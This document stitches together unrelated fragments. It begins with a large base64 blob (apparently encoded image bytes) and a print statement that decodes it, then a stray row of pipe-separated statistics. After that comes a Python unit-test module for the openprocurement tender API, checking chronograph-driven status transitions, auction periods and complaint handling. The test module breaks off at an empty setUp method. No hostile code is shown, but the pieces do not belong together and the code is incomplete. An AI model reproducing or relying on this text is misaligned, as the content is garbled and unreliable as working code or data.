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'
print(base64.urlsafe_b64decode(string.encode('UTF-8')))
| 6,343.8
| 31,647
| 0.964658
| 1,099
| 31,719
| 27.840764
| 0.966333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170377
| 0.000221
| 31,719
| 4
| 31,648
| 7,929.75
| 0.794463
| 0
| 0
| 0
| 0
| 0.333333
| 0.997541
| 0.997383
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
2de4a46676e25a9898bcbb5e3491dd6ab8e021ee
| 78
|
py
|
Python
|
pacote_python/novo_pacote.py
|
Mlluiz39/bootcamp_igti
|
44b2b4322eaf8693f5575f8c27776c0256c86e60
|
[
"MIT"
] | null | null | null |
pacote_python/novo_pacote.py
|
Mlluiz39/bootcamp_igti
|
44b2b4322eaf8693f5575f8c27776c0256c86e60
|
[
"MIT"
] | null | null | null |
pacote_python/novo_pacote.py
|
Mlluiz39/bootcamp_igti
|
44b2b4322eaf8693f5575f8c27776c0256c86e60
|
[
"MIT"
] | null | null | null |
import pacotes_em_python, pacotes_python
pacotes_em_python()
pacotes_python()
| 19.5
| 40
| 0.871795
| 11
| 78
| 5.636364
| 0.363636
| 0.629032
| 0.483871
| 0.709677
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064103
| 78
| 4
| 41
| 19.5
| 0.849315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
2dfd70b552bd900ef08bd015efcaa02d1facaf54
| 15,576
|
py
|
Python
|
src/openprocurement/api/tests/chronograph.py
|
Leits/openprocurement.api
|
9c7cac2f29343d8f184d89551bf0461302b304c8
|
[
"Apache-2.0"
] | null | null | null |
src/openprocurement/api/tests/chronograph.py
|
Leits/openprocurement.api
|
9c7cac2f29343d8f184d89551bf0461302b304c8
|
[
"Apache-2.0"
] | 2
|
2021-03-26T00:34:47.000Z
|
2022-03-21T22:20:52.000Z
|
src/openprocurement/api/tests/chronograph.py
|
leits/openprocurement.api
|
9c7cac2f29343d8f184d89551bf0461302b304c8
|
[
"Apache-2.0"
] | 1
|
2017-08-14T08:05:31.000Z
|
2017-08-14T08:05:31.000Z
|
# -*- coding: utf-8 -*-
import unittest
from openprocurement.api.tests.base import BaseTenderWebTest, test_lots, test_bids
class TenderSwitchTenderingResourceTest(BaseTenderWebTest):
def test_switch_to_tendering_by_enquiryPeriod_endDate(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertNotEqual(response.json['data']["status"], "active.tendering")
self.set_status('active.tendering', {'status': 'active.enquiries', "tenderPeriod": {"startDate": None}})
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], "active.tendering")
def test_switch_to_tendering_by_tenderPeriod_startDate(self):
self.set_status('active.tendering', {'status': 'active.enquiries', "tenderPeriod": {}})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertNotEqual(response.json['data']["status"], "active.tendering")
self.set_status('active.tendering', {'status': self.initial_status, "enquiryPeriod": {}})
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["status"], "active.tendering")
class TenderSwitchQualificationResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_bids = test_bids[:1]
def test_switch_to_qualification(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.qualification")
self.assertEqual(len(response.json['data']["awards"]), 1)
class TenderSwitchAuctionResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_bids = test_bids
def test_switch_to_auction(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.auction")
class TenderSwitchUnsuccessfulResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
def test_switch_to_unsuccessful(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "unsuccessful")
class TenderLotSwitchQualificationResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
initial_bids = test_bids[:1]
def test_switch_to_qualification(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.qualification")
self.assertEqual(len(response.json['data']["awards"]), 1)
class TenderLotSwitchAuctionResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
initial_bids = test_bids
def test_switch_to_auction(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active.auction")
class TenderLotSwitchUnsuccessfulResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
def test_switch_to_unsuccessful(self):
response = self.set_status('active.auction', {'status': self.initial_status})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "unsuccessful")
self.assertEqual(set([i['status'] for i in response.json['data']["lots"]]), set(["unsuccessful"]))
class TenderAuctionPeriodResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
def test_set_auction_period(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['auctionPeriod']['startDate'], '9999-01-01T00:00:00+00:00')
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {"auctionPeriod": {"startDate": None}}})
self.assertEqual(response.status, '200 OK')
self.assertNotIn('auctionPeriod', response.json['data'])
class TenderLotAuctionPeriodResourceTest(BaseTenderWebTest):
initial_status = 'active.tendering'
initial_lots = test_lots
def test_set_auction_period(self):
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}]}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["lots"][0]['auctionPeriod']['startDate'], '9999-01-01T00:00:00+00:00')
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {"lots": [{"auctionPeriod": {"startDate": None}}]}})
self.assertEqual(response.status, '200 OK')
self.assertNotIn('auctionPeriod', response.json['data']["lots"][0])
class TenderComplaintSwitchResourceTest(BaseTenderWebTest):
def test_switch_to_pending(self):
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_data["procuringEntity"],
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
tender = self.db.get(self.tender_id)
tender['complaints'][0]['dateSubmitted'] = '2014-01-01'
self.db.save(tender)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["complaints"][0]['status'], 'pending')
def test_switch_to_complaint(self):
for status in ['invalid', 'resolved', 'declined']:
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/complaints'.format(self.tender_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_data["procuringEntity"],
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
complaint = response.json['data']
response = self.app.patch_json('/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint['id'], self.tender_token), {"data": {
"status": "answered",
"resolutionType": status
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "answered")
self.assertEqual(response.json['data']["resolutionType"], status)
tender = self.db.get(self.tender_id)
tender['complaints'][-1]['dateAnswered'] = '2014-01-01'
self.db.save(tender)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']["complaints"][-1]['status'], status)
class TenderLotComplaintSwitchResourceTest(TenderComplaintSwitchResourceTest):
initial_lots = test_lots
class TenderAwardComplaintSwitchResourceTest(BaseTenderWebTest):
initial_status = 'active.qualification'
initial_bids = test_bids
def setUp(self):
